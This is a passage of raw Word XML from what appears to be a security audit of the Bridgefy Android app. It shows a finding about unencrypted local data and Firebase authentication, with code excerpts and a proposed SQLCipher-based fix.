        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>context,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabase::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabase.DATABASE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.addMigrations[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/ux/phoneValidation/ui/EnterC odeFragment.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>com.google.firebase.auth.FirebaseAuth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lateinit var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>auth: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FirebaseAuth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1016" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>showAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>auth.signInWithEmailAndPassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(getEmailFormatted(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>getEncryptPassword())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="2303" w:right="2112" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.addOnCompleteListener(requireActivity())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>authResult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(authResult.isSuccessful) {[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trivial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="55"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>offer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>way</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="41"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>encryption or use the Android KeyStore at the time of writing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. For this reason, the Android application would have to replace Firebase with a better alternative that leverages the Android Keystore for storing encryption keys, while data remains encrypted at rest utilizing some mature solution like SQLCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. For additional mitigation guidance please see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Mobile Application Security Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>sections for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SQLite Database Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>170</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and appropriate Android KeyStore usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is further recommended to leverage the options provided by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>room </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>172</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> to enable encryption for the SQLite database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-crypto/src/main/java/me/bridgefy/crypto/database/Bridgefy DatabaseWrapper.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>persisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>items):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1115" w:right="0" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BridgefyDatabaseWrapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: CloseableDatabaseWrapper&lt;BridgefyDatabase&gt;(context) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>override fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createDatabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(): BridgefyDatabase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>supportFactory = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SupportFactory(PASSPHRASE.toByteArray()))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="5012" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
